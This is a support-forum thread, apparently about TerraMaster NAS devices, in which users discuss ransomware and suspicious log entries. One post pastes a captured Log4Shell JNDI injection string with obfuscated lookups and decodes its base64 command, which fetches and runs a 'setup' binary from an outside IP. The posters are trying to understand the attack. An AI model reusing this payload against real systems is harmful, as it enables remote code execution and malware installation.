REBELinBLUE wrote:
>
people should not try. The question is. if it is burnable what happens afterwards?
will they attack? It is as if I try to force the door of your house to see if a thief can enter.
But look at this logo here.
*********************
OTHERS. MORE ATTACKS
*********************
******************************************
IP Address Local: 165.232.155.141
ISP Web: 108.161.168.xxx >------------->>>> My IP Address
Hos Local: 165.232.155.141
Date: 11/01/2022 21:21:46
Port Number: 37564
Operating System: Sistema Operativo Desconocido
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
HTTP Referer: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//137.184.40.48:1389/TomcatBypass/Command/Base64/d2dldCBodHRwOi8vMTU4LjEwMS4xMTguMjM2L3NldHVwOyBjdXJsIC1PIGh0dHA6Ly8xNTguMTAxLjExOC4yMzYvc2V0dXA7IGNobW9kIDc3NyBzZXR1cDsgLi9zZXR1cCBleHBsb2l0}')
******************************************
HTTP Referer: Base64
/TomcatBypass/Command/Base64/>---->>>> wget http://158.101.118.236/setup; curl -O http://158.101.118.236/setup; chmod 777 setup; ./setup exploit
IP Address: ISP Digital Ocean, LLC = 165.232.155.141
IP Address: ISP Digital Ocean, LLC = 137.184.40.48
The question is. Big companies are dedicated to making attacks? on the servers looking for I don't know what?
this is weird.
Urgent Notification about TNAS being Attacked by Ransomware
Re: Urgent Notification about TNAS being Attacked by Ransomware
LaMosca wrote:
> IP Address: ISP Digital Ocean, LLC = 165.232.155.141
>
>
> IP Address: ISP Digital Ocean, LLC = 137.184.40.48
>
> The question is. Big companies are dedicated to making attacks? on the servers
> looking for I don't know what?
>
> this is weird.
Not so weird.
DigitalOceanprovide rentable cloud servers, so it is someone who hosts a server on DigitalOcean that is attacking you.
I host a server on DigitalOcean, though just for hosting a website.
Report it to DigitalOcean and I am sure the client will have their server removed.
DigitalOcean (referral)- https://m.do.co/c/968520215356
> IP Address: ISP Digital Ocean, LLC = 165.232.155.141
>
>
> IP Address: ISP Digital Ocean, LLC = 137.184.40.48
>
> The question is. Big companies are dedicated to making attacks? on the servers
> looking for I don't know what?
>
> this is weird.
Not so weird.
DigitalOceanprovide rentable cloud servers, so it is someone who hosts a server on DigitalOcean that is attacking you.
I host a server on DigitalOcean, though just for hosting a website.
Report it to DigitalOcean and I am sure the client will have their server removed.
DigitalOcean (referral)- https://m.do.co/c/968520215356
- REBELinBLUE
- Posts: 30
- Joined: 05 Dec 2021, 06:37
Re: Urgent Notification about TNAS being Attacked by Ransomware
LaMosca wrote:
> REBELinBLUE wrote:
> >
>
> people should not try. The question is. if it is burnable what happens afterwards?
>
> will they attack? It is as if I try to force the door of your house to see if a thief
> can enter.
I honestly have no idea what you are saying...
As I said, the log shows someone trying to log4j exploit, which doesn't impact the TNAS. Any server connected to the public Internet will show things like this, people looking for wp-admin, various .NET exploits etc it doesn't mean they are exploitable, it means someone was looking to see if they were
> REBELinBLUE wrote:
> >
>
> people should not try. The question is. if it is burnable what happens afterwards?
>
> will they attack? It is as if I try to force the door of your house to see if a thief
> can enter.
I honestly have no idea what you are saying...
As I said, the log shows someone trying to log4j exploit, which doesn't impact the TNAS. Any server connected to the public Internet will show things like this, people looking for wp-admin, various .NET exploits etc it doesn't mean they are exploitable, it means someone was looking to see if they were
- Charlie_Croker
- Posts: 105
- Joined: 07 Oct 2020, 19:05
Re: Urgent Notification about TNAS being Attacked by Ransomware
LaMosca wrote:
>
Its often not someone trying to hack your network, its a "bot", these bots crawl the web probing ports looking for vulnerabilities, and some of these aren't bad actors, they're reputable companies looking to discover how many devices have unpatched vulnerabilities, for example my Intrusion Protection System (IPS) reports this address so often that I asked them to remove my WAN IP from the ones they scan. (Their IP is 146.88.240.4 and you can see I am not alone in noticing this ),https://www.abuseipdb.com/check/146.88.240.4 the company is actually https://www.netscout.com
Even hackers don't often pick an IP at random and then try to hack it, (well unless you're a bank the NSA, CIA etc), they send a bot out to find any IPs which might be vulnerable and then use scripts to try to run exploits, this probably happened with the Terramaster and Qlocker attacks, it wasn't someone sat at a PC encrypting your files, it was just a script kiddie :)
As REBELinBLUE said, in your case its ooks to be a bot looking for possible unpatched Log4J https://www.ncsc.gov.uk/information/log ... ds-to-know
More on Bots here https://www.hindawi.com/journals/scn/2017/5960307/
>
Its often not someone trying to hack your network, its a "bot", these bots crawl the web probing ports looking for vulnerabilities, and some of these aren't bad actors, they're reputable companies looking to discover how many devices have unpatched vulnerabilities, for example my Intrusion Protection System (IPS) reports this address so often that I asked them to remove my WAN IP from the ones they scan. (Their IP is 146.88.240.4 and you can see I am not alone in noticing this ),https://www.abuseipdb.com/check/146.88.240.4 the company is actually https://www.netscout.com
Even hackers don't often pick an IP at random and then try to hack it, (well unless you're a bank the NSA, CIA etc), they send a bot out to find any IPs which might be vulnerable and then use scripts to try to run exploits, this probably happened with the Terramaster and Qlocker attacks, it wasn't someone sat at a PC encrypting your files, it was just a script kiddie :)
As REBELinBLUE said, in your case its ooks to be a bot looking for possible unpatched Log4J https://www.ncsc.gov.uk/information/log ... ds-to-know
More on Bots here https://www.hindawi.com/journals/scn/2017/5960307/
- REBELinBLUE
- Posts: 30
- Joined: 05 Dec 2021, 06:37
Re: Urgent Notification about TNAS being Attacked by Ransomware
Fair point, hadn't thought about it possibly just being a reputable organisation "just looking" as it were
https://www.abuseipdb.com/check/158.101.118.236
https://www.abuseipdb.com/check/158.101.118.236
- Charlie_Croker
- Posts: 105
- Joined: 07 Oct 2020, 19:05
Re: Urgent Notification about TNAS being Attacked by Ransomware
It seems those of us who are QNAP users have discovered another new Ransomware exploit in the last 24 hours, called "Deadbolt" https://forum.qnap.com/viewtopic.php?f= ... 7&start=15 (Thanks to my Firewall, so far I have not been attacked successfully yet!).
Be careful people,
Be careful people,
- Charlie_Croker
- Posts: 105
- Joined: 07 Oct 2020, 19:05
Re: Urgent Notification about TNAS being Attacked by Ransomware
And more on Deadbolt. (QNAP exploit for now). But hopefully one TM are aware of and ensuring its not an exploit on TM devices https://www.reddit.com/r/qnap/comments/ ... nst_qnaps/
- crisisacting
- Posts: 261
- Joined: 20 Jan 2022, 16:42
Re: Urgent Notification about TNAS being Attacked by Ransomware
There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/
As this affects most Linux distributions, openWRT is likely impacted as well.
As this affects most Linux distributions, openWRT is likely impacted as well.
Re: Urgent Notification about TNAS being Attacked by Ransomware
pkexec has not been used in TOS.crisisacting wrote: ↑27 Jan 2022, 03:26 There's another … CVE-2021-4034 (PwnKit): https://www.bleepingcomputer.com/news/s ... -released/
As this affects most Linux distributions, openWRT is likely impacted as well.
To contact our team, please send email to following addresses, remember to replace (at) with @:
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
Support team: support(at)terra-master.com (for technical support only)
Service team: service(at)terra-master.com (for purchasing, return, replacement, RMA service)
- peter.horsley
- Posts: 3
- Joined: 22 Feb 2021, 08:44
Re: Urgent Notification about TNAS being Attacked by Ransomware
Short version: I see the word "ransomwar" (no e) in the HDMI console of a fresh install of TOS, downloaded from the official website. I took a photo of it which you can see via the below line. Can anyone explain this?
https://www.dropbox.com/s/vp31acfsneabs ... r.jpg?dl=0
Long version:
I noticed there was kinsing miner evidence on my NAS, and then started seeing files getting created including a readme.txt stating "All files are gone" with my email address, so it looks like a ransomware attach was in progress. I was shocked to find out about UPNP default settings that mean the NAS is accessible to the public internet. I have now disabled UPNP on my router. Then I took out all HDDs, put them in another computer and deleted all partitions. Then I tried to boot TNAS again but it failed to get an IP address. So I plugged in HDMI and noticed it was stuck trying to boot of the internal USB. So I found the instructions on how to re-image the USB drive after after several unsuccessful attempts, I found the dropbox link to the bzImage archive which did work (after changing grub-install to grub2-install in make_install). Once booted, I went to initialize, inserted HDDs, but it failed to install the latest TOS image 4.2.28 at 55%. I tried the 2nd latest image 4.1.27 and it succeeded. All this time I had the HDMI plugged to monitor progress. I noticed the word "ransomwar" appear as shown in the above photo on boot of 4.1.27 which is highly concerning considering this is a freshly image USB and freshly initialized TOS downloaded today with blank HDDs inserted. After upgrading to 4.2.28, I don't see that message on boot in the console anymore. It makes me wonder whether the official 4.1.27 contains ransomware!!
Can support please explain what is shown in the photo please?
https://www.dropbox.com/s/vp31acfsneabs ... r.jpg?dl=0
Long version:
I noticed there was kinsing miner evidence on my NAS, and then started seeing files getting created including a readme.txt stating "All files are gone" with my email address, so it looks like a ransomware attach was in progress. I was shocked to find out about UPNP default settings that mean the NAS is accessible to the public internet. I have now disabled UPNP on my router. Then I took out all HDDs, put them in another computer and deleted all partitions. Then I tried to boot TNAS again but it failed to get an IP address. So I plugged in HDMI and noticed it was stuck trying to boot of the internal USB. So I found the instructions on how to re-image the USB drive after after several unsuccessful attempts, I found the dropbox link to the bzImage archive which did work (after changing grub-install to grub2-install in make_install). Once booted, I went to initialize, inserted HDDs, but it failed to install the latest TOS image 4.2.28 at 55%. I tried the 2nd latest image 4.1.27 and it succeeded. All this time I had the HDMI plugged to monitor progress. I noticed the word "ransomwar" appear as shown in the above photo on boot of 4.1.27 which is highly concerning considering this is a freshly image USB and freshly initialized TOS downloaded today with blank HDDs inserted. After upgrading to 4.2.28, I don't see that message on boot in the console anymore. It makes me wonder whether the official 4.1.27 contains ransomware!!
Can support please explain what is shown in the photo please?